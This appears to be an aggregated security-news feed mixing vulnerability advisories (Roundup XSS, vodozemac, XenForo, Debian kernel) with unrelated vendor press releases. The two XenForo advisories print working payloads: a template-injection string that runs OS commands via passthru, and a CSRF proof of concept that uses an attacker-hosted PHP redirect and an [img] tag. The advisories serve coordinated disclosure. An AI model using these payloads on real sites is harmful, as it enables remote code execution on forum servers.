In Roundup before 2.4.0, classhelpers (_generic.help.html) allow XSS.

**Roundup Cross-site Scripting Vulnerability**

Moderate severity GitHub Reviewed Published Jul 17, 2024 to the GitHub Advisory Database • Updated Jul 17, 2024

GHSA-w8vc-cwv9-wx67: Roundup Cross-site Scripting Vulnerability

Roundup before 2.4.0 allows XSS via JavaScript in PDF, XML, and SVG documents.

GHSA-x37x-qf4v-f54f: Roundup Cross-site Scripting Vulnerability

Roundup before 2.4.0 allows XSS via a SCRIPT element in an HTTP Referer header.

GHSA-xjgw-ghrx-wfff: Roundup Cross-site Scripting Vulnerability

PRESS RELEASE

REDWOOD SHORES, Calif., July 16, 2024 /PRNewswire/ -- Tumeryk Inc., a leader in AI security solutions, proudly announces the launch of the Tumeryk AI Security Studio to enable organizations to simulate and enhance generative AI (gen AI) security. The large language model (LLM) vulnerability scanner can be run by security professionals against their gen AI API inference endpoints. The Tumeryk LLM Safety Report generated allows enterprises to discover potential gen AI risks and protect against them by building security policies in the Tumeryk Gen AI Firewall. The Gen AI Firewall is built using NVIDIA NeMo Guardrails and other state-of-the-art tools and research.

Tumeryk is also hosting a free webinar - Generative AI Security and Risk Mitigation - featuring Rohit Valia, CEO and founder of Tumeryk, and Christopher Parisien, senior manager of applied research at NVIDIA, to share how organizations can leverage Tumeryk's technologies to safely deploy gen AI-based applications into production. Sign up for the webinar enables access to the free gen AI LLM vulnerability scanner service and the Tumeryk Gen AI Security Studio.

"By making the gen AI LLM vulnerability scanner service available for free, Tumeryk is allowing organizations to get an understanding of their risk profile while using these innovative technologies and ensuring that they stay secure and compliant," said Valia. "Artificial intelligence, particularly Gen AI, holds immense transformative potential – and demand for the best security tools." 

"Gen AI presents a powerful opportunity for innovation, and organizations must approach implementations with safety in mind, especially for regulated industries. As CISOs, we need to adapt our security capabilities and operations to be inclusive of Gen AI solutions," said Puneet Thapliyal, ex-CISO at Hippocratic.ai. "Tumeryk provides the tools for enterprises to enhance gen AI security."

The Gen AI Security Studio is designed for security analysts, providing a comprehensive platform to scan LLMs and build and test gen AI Firewall policies. This proactive approach helps identify vulnerabilities and strengthens AI defenses prior to deployment. 

The Gen AI Firewall enables centralized controls over gen AI access. Security and governance teams can collaborate with developers to build sophisticated guardrails using the Gen AI Security Studio and deploy them to the Gen AI Firewall. Utilizing NVIDIA NeMo Guardrails, the Gen AI Firewall leverages heuristics to block jailbreak attempts, score hallucinations, moderate content, and orchestrate dialogs. It enables the creation of virtual silos for LLMs using role-based access control (RBAC) and enhances security through an API key vault. This firewall is crucial for maintaining the integrity and reliability of AI systems by helping ensure interactions remain within predefined security parameters.

The AI Security Monitoring Dashboard offers a single pane of glass for monitoring LLMs across cloud providers. This allows operations teams to monitor the performance of gen AI applications and review comprehensive logs and alerts to ensure any deviations from expected behavior are promptly addressed. 

The free LLM scanner and Gen AI Security Studio can be accessed from the AWS Marketplace or https://tumeryk.com/, providing easy access for organizations looking to enhance their AI security posture. Tumeryk AI solutions represent a significant advancement in AI security, offering a holistic approach to managing the complexities of gen AI. As AI continues to integrate deeper into business operations, Tumeryk Inc. remains at the forefront of ensuring these systems are secure, reliable, and aligned with organizational policies.

About Tumeryk Inc.

Tumeryk Inc. is a pioneering company in AI security solutions, dedicated to developing innovative technologies that safeguard AI systems. With a focus on proactive risk management and comprehensive protection strategies, Tumeryk Inc. enables organizations to deploy AI with confidence and integrity.

You May Also Like

Tumeryk Inc. Launches With Free Gen AI LLM Vulnerability Scanner

PRESS RELEASE

BETHESDA, Md., July 16, 2024 /PRNewswire-PRWeb/ -- As organizations continue to fortify their cybersecurity strategies in response to an ever-evolving threat landscape, many are turning to Zero Trust architectures to safeguard their data. However, implementing Zero Trust is not without its challenges. According to a new strategy guide from the SANS Institute, "Navigating the Path to a State of Zero Trust in 2024," businesses often stumble over key obstacles in their journey towards Zero Trust adoption.

"The path to achieving a true state of Zero Trust isn't straightforward. Organizations often encounter several fundamental challenges when attempting to implement end-to-end Zero Trust principles across their environment," said Ismael Valenzuela, SANS Senior Instructor and author of the Cyber Defense and Blue Team Operations course, SANS SEC530: Defensible Security Architecture and Engineering. "By understanding and addressing these common mistakes, businesses can make better strategic and tactical decisions and increase their resiliency in the face of evolving threats."

Here are the top five mistakes identified:

● Overlooking the Importance of Organizational Culture: Zero Trust is more than just a technological shift; it requires a fundamental change in organizational culture. Chief Information Security Officers (CISOs) must align security with strategic, operational, and financial priorities. As the strategy guide states, "Effective security is driven by people, processes, and technology." Failure to secure stakeholder buy-in from the outset can doom Zero Trust initiatives to fail.

● Underestimating Human Risk: Employee error and negligence account for over 80% of data breaches. Hybrid work environments blur the lines between personal and professional spaces, increasing the complexity of monitoring user activity. "A Zero Trust architecture is an important line of defense against human risk," the strategy guide emphasizes. Organizations must implement continuous monitoring and real-time assessment of user behavior to mitigate these risks.

● Neglecting the Supply Chain: Recent high-profile supply chain attacks have underscored the vulnerabilities within interconnected systems. According to Gartner, by 2025, 45% of organizations worldwide will have experienced attacks on their supply chains. Zero Trust principles help limit the impact of these breaches by ensuring continuous verification and deeper visibility into user activity.

● Failing to Plan for Sustainable Success: Implementing Zero Trust is a long-term commitment that requires continuous improvement and adaptation. The SANS strategy guide highlights the importance of effective change management practices: "Effective change management ensures stakeholder buy-in, facilitates user adoption, minimizes disruption, promotes continuous improvement, and enhances collaboration."

● Inadequate Measurement of Success: Measuring the effectiveness of a Zero Trust framework is crucial for maintaining stakeholder support. The guide suggests several metrics, including authentication success rates, policy compliance rates, and the time to detect and respond to incidents. These metrics provide a clear picture of the framework's impact and highlight areas for improvement.

"Adopting the Zero Trust 'never trust, always verify' mindset is essential for modern cybersecurity," said Valenzuela. "However, the real challenge lies in having a realistic understanding of what a Zero Trust architecture looks like and avoiding common pitfalls during implementation. From cultural shifts to technical deployments, this offers vital guidance to help organizations successfully navigate the complexities of Zero Trust and enhance their cybersecurity resilience."

For more information on implementing Zero Trust and to download the full strategy guide, visit: https://www.sans.org/u/1xo2

Top 5 Mistakes Businesses Make When Implementing Zero Trust

PRESS RELEASE

BOSTON, July 16, 2024 /PRNewswire/ -- Cybercrimes like dealer system hacks, identity theft, and breaches are wreaking havoc on the auto industry. As the industry becomes more technology-driven, increasingly sophisticated cybercriminals are finding more opportunities to strike. In fact, the auto sector is now the third most targeted behind healthcare and financial services. The recent attacks against Findlay Auto Group and CDK Global are just two of many examples that have brought attention to the industry's vulnerabilities.

A number of regulations have been issued to ensure dealers adequately protect consumer data. In particular, the Red Flags Rule requires dealers to implement programs to protect customers from potential identity theft and fraud.

That's why Aura, the all-in-one consumer online safety solution, today announced its partnership with Mosaic Compliance Services to provide identity protection to anyone who gives dealers personally identifiable information (PII) during the car-buying process.

Mosaic is a leader in helping dealerships nationwide implement legally defensible and insurable compliance systems. By combining Aura's award-winning identity theft protection services with Mosaic's industry-leading fully managed compliance solutions, this partnership helps dealers adhere to the Red Flags Rule regulations, mitigate risk, and provide proactive protection from cybercrime for their roofs, shoppers, and buyers.

"We partnered with Aura so that every consumer, shopper, or buyer gets identity theft protection simply because they gave the dealer their non-public personal information," said James S. Ganther, Esq., CEO at Mosaic Compliance Services. "Through this collaboration, we're able to both provide peace of mind to buyers whose information is collected and ease the compliance burden for dealers–providing everything from counsel on policies to operational improvements, audits, and consumer online protections."

Aura plays a crucial role in the mitigation piece of compliance with the Red Flags Rule. With these regulations, auto dealers are now obligated to protect the personal information provided to them. By offering Aura to consumers, dealers help proactively mitigate fraudby monitoring for instances of identity theft, credit misuse, and financial fraud.

"With cyber attacks, scams, and breaches happening every day, car buyers are aware of the risk associated with providing their personal information to companies," said Scott Hudson, Senior Vice President of Sales at Aura. We know that 84% of customers say they would not buy another vehicle from a dealership if a breach compromised their data. By offering Aura's identity protection solution to every consumer who provides personally identifiable information, dealers can earn trust upfront in the car-buying process."

Aura works with hundreds of dealerships across the U.S. to offer identity and fraud protection to hundreds of thousands of consumers. If you're interested in partnering with Aura and Mosaic Compliance Services, contact \[email protected\].

ABOUT AURA   
Aura is one of the fastest growing online safety solutions for individuals and families. Whether you're protecting yourself, your kids, or your aging loved ones, Aura can meet your needs at every stage of life. Customers trust Aura's simple interface to effortlessly safeguard the things they care about most. Through real-time monitoring and alerts, Aura helps detect and mitigate emerging online threats, such as scams, predators and cyberbullying. To discover how Aura is reshaping online safety for people everywhere, visit www.aura.com.

ABOUT MOSAIC COMPLIANCE SERVICES   
Mosaic Compliance Services was founded in 2006 by automotive attorneys who saw the need to make compliance more approachable and effective for dealerships. Today, Mosaic is a leading provider of compliance solutions for dealers. Serving over 150,000 active users, we help dealerships across the country implement a culture of compliance that includes processes, training, policies, certifications, safeguards, audits, and more. Our web-based legal compliance training has received the Dealers' Choice Diamond Award eight years in a row, including 2023. In everything we do Mosaic strives to provide the most knowledgeable service and tailored guidance in the industry. As your dedicated compliance partner, our goal is your success.

Aura Partners With Mosaic Compliance Services to Launch a Program to Protect Auto Dealers and Buyers From Cybercrime

Versions before 0.7.0 of vodozemac use a non-constant time base64 implementation for importing key material for Megolm group sessions and `PkDecryption` Ed25519 secret keys. This flaw might allow an attacker to infer some information about the secret key material through a side-channel attack.

### Impact

The use of a non-constant time base64 implementation might allow an attacker to observe timing variations in the encoding and decoding operations of the secret key material. This could potentially provide insights into the underlying secret key material.

The impact of this vulnerability is considered low because exploiting the attacker is required to have access to high precision timing measurements, as well as repeated access to the base64 encoding or decoding processes.  Additionally, the estimated leakage amount is bounded and low according to the referenced paper.

### Patches

The patch is in commit 734b6c6948d4b2bdee3dd8b4efa591d93a61d272.

### Workarounds
None.

### References
A detailed description of the precise attack can be found at https://arxiv.org/abs/2108.04600. We kindly thank Soatok for pointing out this research to us.

### For more information
If you have any questions or comments about this advisory please email us at [security at matrix.org](mailto:security@matrix.org).


Versions before 0.7.0 of vodozemac use a non-constant time base64 implementation for importing key material for Megolm group sessions and PkDecryption Ed25519 secret keys. This flaw might allow an attacker to infer some information about the secret key material through a side-channel attack.

**Impact**

The use of a non-constant time base64 implementation might allow an attacker to observe timing variations in the encoding and decoding operations of the secret key material. This could potentially provide insights into the underlying secret key material.

The impact of this vulnerability is considered low because exploiting the attacker is required to have access to high precision timing measurements, as well as repeated access to the base64 encoding or decoding processes. Additionally, the estimated leakage amount is bounded and low according to the referenced paper.

**Patches**

The patch is in commit 734b6c6948d4b2bdee3dd8b4efa591d93a61d272.

**Workarounds**

None.

**References**

A detailed description of the precise attack can be found at https://arxiv.org/abs/2108.04600. We kindly thank Soatok for pointing out this research to us.

**For more information**

If you have any questions or comments about this advisory please email us at security at matrix.org.

**References**

*   GHSA-j8cm-g7r6-hfpq
*   matrix-org/vodozemac@734b6c6
*   matrix-org/vodozemac@77765da
*   https://arxiv.org/abs/2108.04600

GHSA-j8cm-g7r6-hfpq: vodozemac's usage of non-constant time base64 decoder could lead to leakage of secret key material

XenForo versions 2.2.15 and below suffer from a remote code execution vulnerability in the Template system.

    -----------------------------------------------------------------------XenForo <= 2.2.15 (Template System) Remote Code Execution Vulnerability-----------------------------------------------------------------------[-] Software Link:https://xenforo.com[-] Affected Versions:Version 2.2.15 and prior versions.[-] Vulnerability Description:XenForo implements a template system which gives complete control overthe layout of XenForo pages. Through these templates, it might bepossible to call certain "callback methods", however there is a sortof "sandbox" which allows to solely call read-only methods: a methodis to be considered read-only when it begins with one of the allowedprefixes, such as "get" or "filter". Malicious users might be able tobypass this "sandbox" by abusing the getRepository() method from theXF\Mvc\Entity\Manager class in order to get an instance object of theXF\Util\Arr class, and from there they can abuse its filterRecursive()static method in order to execute arbitrary callbacks or functions(internally, this method calls the array_filter() PHP function with anattacker-controlled "callback" parameter). As such, this can beexploited to e.g. execute arbitrary OS commands by using a payloadlike the following within a template, which will try to execute thepassthru() PHP function passing to it the string "whoami" as argument,potentially resulting in the execution of the "whoami" command on theweb server:{{ $xf.app.em.getRepository('XF\Util\Arr').filterRecursive(['whoami'],'passthru')}}Successful exploitation of this vulnerability requires an account withpermissions to administer styles or widgets.[-] Solution:Update to a fixed version or apply the vendor patches.[-] Disclosure Timeline:[22/02/2024] - Vulnerability details sent to SSD Secure Disclosure[05/06/2024] - Vendor released patches and fixed versions[14/06/2024] - CVE identifier requested[16/06/2024] - CVE identifier assigned[16/07/2024] - Coordinated public disclosure[-] CVE Reference:The Common Vulnerabilities and Exposures project (cve.mitre.org) hasassigned the name CVE-2024-38458 to this vulnerability.[-] Credits:Vulnerability discovered by Egidio Romano.[-] Other References:https://xenforo.com/community/threads/222133https://ssd-disclosure.com/ssd-advisory-xenforo-rce-via-csrf/[-] Original Advisory:http://karmainsecurity.com/KIS-2024-06

Xenforo 2.2.15 Remote Code Execution

XenForo versions 2.2.15 and below suffer from a cross site request forgery vulnerability in Widget::actionSave.

-------------------------------------------------------------------------------  
XenForo <= 2.2.15 (Widget::actionSave) Cross-Site Request Forgery Vulnerability  
-------------------------------------------------------------------------------

[-] Software Link:

https://xenforo.com

[-] Affected Versions:

Version 2.2.15 and prior versions.

[-] Vulnerability Description:

The XF\Admin\Controller\Widget::actionSave() method, defined into the  
/src/XF/Admin/Controller/Widget.php script, does not check whether the  
current HTTP request is a POST or a GET before saving a widget.  
XenForo does perform anti-CSRF checks for POST requests only, as such  
this method can be abused in a Cross-Site Request Forgery (CSRF)  
attack to create/modify arbitrary XenForo widgets via GET requests,  
and this can also be exploited in tandem with KIS-2024-06 to perform  
CSRF-based Remote Code Execution (RCE) attacks.

Furthermore, XenForo implements a BB code system, as such this  
vulnerability could also be exploited through "Stored CSRF" attacks by  
abusing the [img] BB code tag, creating a thread or a private message  
(to be sent to the victim user) like the following:

[img]https://attacker.website/exploit.php[/img]

Where the exploit.php script hosted on the attacker-controlled website  
could be something like this:

<?php

$url = "https://victim.website/xenforo/";

header("Location:  
{$url}admin.php?widgets/save&definition_id=html&widget_key=RCE&positions[pub_sidebar_top]=1&display_condition=true&options[template]={{\$xf.app.em.getRepository('XF\\Util\\Arr').filterRecursive(['id'],'passthru')}}");

?>

Successful exploitation of this vulnerability requires a victim user  
with permissions to administer styles or widgets to be currently  
logged into the Admin Control Panel.

[-] Solution:

Update to a fixed version or apply the vendor patches.

[-] Disclosure Timeline:

[22/02/2024] - Vulnerability details sent to SSD Secure Disclosure  
[05/06/2024] - Vendor released patches and fixed versions  
[14/06/2024] - CVE identifier requested  
[16/06/2024] - CVE identifier assigned  
[16/07/2024] - Coordinated public disclosure

[-] CVE Reference:

The Common Vulnerabilities and Exposures project (cve.mitre.org) has  
assigned the name CVE-2024-38457 to this vulnerability.

[-] Credits:

Vulnerability discovered by Egidio Romano.

[-] Other References:

https://xenforo.com/community/threads/222133  
https://ssd-disclosure.com/ssd-advisory-xenforo-rce-via-csrf/

[-] Original Advisory:

http://karmainsecurity.com/KIS-2024-05

XenForo 2.2.15 Cross Site Request Forgery

Debian Linux Security Advisory 5731-1 - Several vulnerabilities have been discovered in the Linux kernel that may lead to a privilege escalation, denial of service or information leaks.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5731-1                   security@debian.org  
https://www.debian.org/security/                     Salvatore Bonaccorso  
July 16, 2024                         https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : linux  
CVE ID         : CVE-2023-52760 CVE-2024-25741 CVE-2024-27397 CVE-2024-36894  
                 CVE-2024-36973 CVE-2024-36978 CVE-2024-37078 CVE-2024-38619  
                 CVE-2024-39298 CVE-2024-39371 CVE-2024-39469 CVE-2024-39474  
                 CVE-2024-39484 CVE-2024-39487 CVE-2024-39494 CVE-2024-39495  
                 CVE-2024-39496 CVE-2024-39499 CVE-2024-39500 CVE-2024-39501  
                 CVE-2024-39502 CVE-2024-39503 CVE-2024-39505 CVE-2024-39506  
                 CVE-2024-39507 CVE-2024-39509 CVE-2024-39510 CVE-2024-40899  
                 CVE-2024-40900 CVE-2024-40901 CVE-2024-40902 CVE-2024-40903  
                 CVE-2024-40904 CVE-2024-40905 CVE-2024-40906 CVE-2024-40908  
                 CVE-2024-40910 CVE-2024-40911 CVE-2024-40912 CVE-2024-40913  
                 CVE-2024-40914 CVE-2024-40915 CVE-2024-40916 CVE-2024-40919  
                 CVE-2024-40920 CVE-2024-40921 CVE-2024-40924 CVE-2024-40927  
                 CVE-2024-40929 CVE-2024-40931 CVE-2024-40932 CVE-2024-40934  
                 CVE-2024-40935 CVE-2024-40937 CVE-2024-40938 CVE-2024-40939  
                 CVE-2024-40940 CVE-2024-40941 CVE-2024-40942 CVE-2024-40943  
                 CVE-2024-40947 CVE-2024-40948 CVE-2024-40953 CVE-2024-40954  
                 CVE-2024-40956 CVE-2024-40957 CVE-2024-40958 CVE-2024-40959  
                 CVE-2024-40960 CVE-2024-40961 CVE-2024-40963 CVE-2024-40966  
                 CVE-2024-40967 CVE-2024-40968 CVE-2024-40970 CVE-2024-40971  
                 CVE-2024-40974 CVE-2024-40976 CVE-2024-40977 CVE-2024-40978  
                 CVE-2024-40980 CVE-2024-40981 CVE-2024-40983 CVE-2024-40984  
                 CVE-2024-40987 CVE-2024-40988 CVE-2024-40989 CVE-2024-40990  
                 CVE-2024-40993 CVE-2024-40994 CVE-2024-40995 CVE-2024-40996  
                 CVE-2024-41000 CVE-2024-41001 CVE-2024-41002 CVE-2024-41004  
                 CVE-2024-41005 CVE-2024-41006

Several vulnerabilities have been discovered in the Linux kernel that  
may lead to a privilege escalation, denial of service or information  
leaks.

For the stable distribution (bookworm), these problems have been fixed in  
version 6.1.99-1.

We recommend that you upgrade your linux packages.

For the detailed security status of linux please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/linux

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmaWylhfFIAAAAAALgAo  
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2  
NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xND  
z0SMThAAiAanrQH+A4sTcRMZgwj521PKppx6+06c3jbqktG8XwQeOmaRrA1tgeyV  
ABahFSib/84PJtdqpW8+EHSJvGvxm9TKND98pPV6SjId2Ly7D+ARnfm6vIZzW/Sv  
WOZx0IU/So8qbZ7OjvKTfT+869yJ+MfRnYhdfuFTSJaZYehMyeizUMM5fjBX3dSf  
BBKcxR9w/RI2OgxiN45Q9+FrCCMS26RBTzRcb3pskw8741gzDyEostjjG+k5B8XJ  
/gEu10O3dGKtRV/1Uhkd5R4ACkcXHovox9EmA2vizGNfhf981cTeBT2ZIPIzstIY  
+/vkd4uUPi/OgIEBlkvcQx0UUaYctqDOnpvRqrLU9hwBkhlk0ueHxaHiBl9tf6L2  
CDYb1BROY2A0eDSqCFugYMjzZDIbihFUS1Ly1TKDqea5xDTfiZcWa1u7bFp/LR2C  
075lTh79e3GMdFceWfJk9SiPrFZnpCiokTmvbg4c0U7ac8ruXbAcV4i79exMTgwe  
VtUBFRufnLesmMmolGnqWSDA4Mf+w04MXJj3tU9N4MfC0bG0Y46IlNrabDOhUlns  
VdHvDLQOIMcFOl8rfKjFs+wTuUkRZUSFNQotG1WDiTezcQqbMS2eodVCB6Cq/51W  
L6oukVbbmncmYgYY3BGLTfn7ZxHUK3nhu/WmxtmwI4KsViLd8+Q=  
=KPq+  
-----END PGP SIGNATURE-----

Tag

#vulnerability